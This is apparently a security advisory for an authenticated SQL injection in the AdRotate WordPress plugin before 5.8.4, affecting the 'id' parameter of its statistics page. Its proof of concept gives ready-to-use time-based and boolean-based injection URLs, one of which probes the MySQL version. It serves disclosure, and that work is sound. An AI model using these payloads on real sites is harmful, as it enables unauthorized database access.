AdRotate < 5.8.4 - Authenticated SQL Injection

Authenticated SQL injection in the AdRotate 5.8.3.1 exists via param “id”. However, this requires an admin privileged user. NOTE: The plugin author mistook this SQLi bug for XSS but the remedy remains OK.

PoC

Param “id” is vulneable to SQL Injeciton. Example 1: http://example.com/wp-admin/admin.php?page=adrotate-statistics&amp;view;=group&amp;id;=1+AND+SLEEP(10) Clear version: wp-admin/admin.php?page=adrotate-statistics&view;=group&id;=1 AND SLEEP(10) This query will delay page load by 10 seconds Example 2: by using a boolean-based technique, one can extract info about the system. http://example.com/wp-admin/admin.php?page=adrotate-statistics&amp;view;=group&amp;id;=2+AND+1%3D(SELECT+IF+(+GREATEST(+ORD(MID(%40%40version%2C+1%2C+1))%2C+1)+%3D+53%2C+1%2C+0)) Clear version: wp-admin/admin.php?page=adrotate-statistics&view;=group&id;=2 AND 1=(SELECT IF ( GREATEST( ORD(MID(@@version, 1, 1)), 1) = 53, 1, 0)) This query will check if the first char of MySQL version is “5” or not.